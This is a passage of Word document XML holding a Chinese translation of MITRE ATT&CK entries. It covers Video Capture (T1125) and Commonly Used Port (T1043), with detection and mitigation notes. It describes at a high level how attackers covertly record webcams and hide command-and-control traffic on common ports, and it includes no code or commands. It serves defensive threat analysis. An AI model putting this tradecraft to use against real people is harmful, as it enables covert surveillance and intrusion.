            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6047B7E8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A04C99" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A04C99">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:t xml:space="preserve"> T1125</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A6739DD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A04C99" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>采集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2523B36C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A04C99" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A04C99">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:t xml:space="preserve"> Windows, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A6EB6E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A04C99" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A04C99">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FA2D9D0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A04C99" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A04C99">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，文件监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="358AEE42" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A04C99" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A04C99">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:t>: Praetorian</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DE330D2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A04C99">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04C99">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D67FD59" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A4160B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396EFEA6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003D0EC7" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以利用计算机的外围设备（例如，集成的相机或网络摄像头）或应用程序（例如，视频呼叫服务）来捕获视频记录以便收集信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可以以指定的间隔从设备或应用程序捕获图像，代替视频文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722BEC6F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003D0EC7" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件或脚本可用于通过操作系统或应用程序提供的可用</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与设备交互以捕获视频或图像。</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>视频或图像文件可能会写入磁盘并在以后进行渗透。</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于使用特定设备或应用程序进行视频录制而不是捕获受害者的屏幕，因此该技术与屏幕捕获不同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1A5F21" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003D0EC7" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>macOS</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，有一些不同的恶意软件样本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录用户的网络摄像头，如</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FruitFly</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Proton</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0EC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C031C2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68419EDD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它基于系统功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387877C0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0096E289" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00141A2E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于可以使用各种</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因此可能难以检测该技术。</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用的数据可能没有用，这取决于系统如何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常使用，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能为系统上发生的其他潜在恶意活动提供上下文。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377D56D2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能有用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术使用的行为包括访问摄像机，记录设备或记录软件交互的设备或软件相关联的</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的未知或异常过程，以及定期将文件写入包含视频或相机图像数据的磁盘的过程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7880D8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF3B982" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:sectPr w:rsidR="00A0413E" w:rsidSect="00D7725A">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77CF5E46" w14:textId="02EF9026" w:rsidR="00A0413E" w:rsidRDefault="00F743F9" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>命令与控制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B60D55" w14:textId="2A576BB1" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00724D59">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通用端口</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00724D59" w:rsidRPr="00A65911" w14:paraId="585F3D88" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="212A5D5B" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1043</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="714C3FFA" w14:textId="68B5B062" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="153F4472" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37318F2C" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：网络抓包，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术网络流分析，网络进程使用，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="034E68F3" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="721CDD35" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58C85DF3" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00724D59">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C9216D" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00173185">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会通过通用端口进行通信来绕过防火墙或网络检测系统，并混入正常的网络活动来避免更详细的检查。他们可能会使用如下通用开放</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54140686" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="0038171C">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>TCP:80 (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B17CD" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="0038171C">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>TCP:443 (HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDCD423" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="0038171C">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>TCP:25 (SMTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C31331" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="0038171C">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>TCP/UDP:53 (DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC3F56D" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="0038171C">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会使用端口关联的协议或完全不同的协议。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB1A09" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="0038171C">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>飞地内的连接（例如，代理节点或枢纽节点与其他节点之间的连接）使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通用端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>示例如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55129107" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00724D59">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>TCP/UDP:135 (RPC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44529781" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00724D59">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>TCP/UDP:22 (SSH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8B0129" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00724D59">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>TCP/UDP:3389 (RDP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B85ECF" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00724D59">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="00724D59" w:rsidRPr="0038171C" w14:paraId="5E9ED5A9" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7619E7AA" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="0038171C" w:rsidRDefault="00724D59" w:rsidP="0038171C">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0038171C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5AD95500" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="0038171C" w:rsidRDefault="00724D59" w:rsidP="0038171C">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0038171C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724D59" w:rsidRPr="00A65911" w14:paraId="612C0263" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="1276"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E77AD7B" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId234" w:history="1">
              <w:r w:rsidR="00724D59" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20470F8B" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用可以通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络签名来识别</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特定</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>攻击者恶意软件流量的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>入侵检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>防御系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来缓解网络级别活动的影响。签名通常是协议中的唯一指示符，可能基于攻击者或工具的特定协议，并且在各种恶意软件系列和版本中可能会有所不同。攻击者可能</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>会随着时间的推移更改工具</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>&amp;C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名，或者构建协议</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>来逃避常见防御工具的检测。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724D59" w:rsidRPr="00A65911" w14:paraId="65D9AE89" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70648753" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId235" w:history="1">
              <w:r w:rsidR="00724D59" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络分区</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BA8628D" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00D6184F">
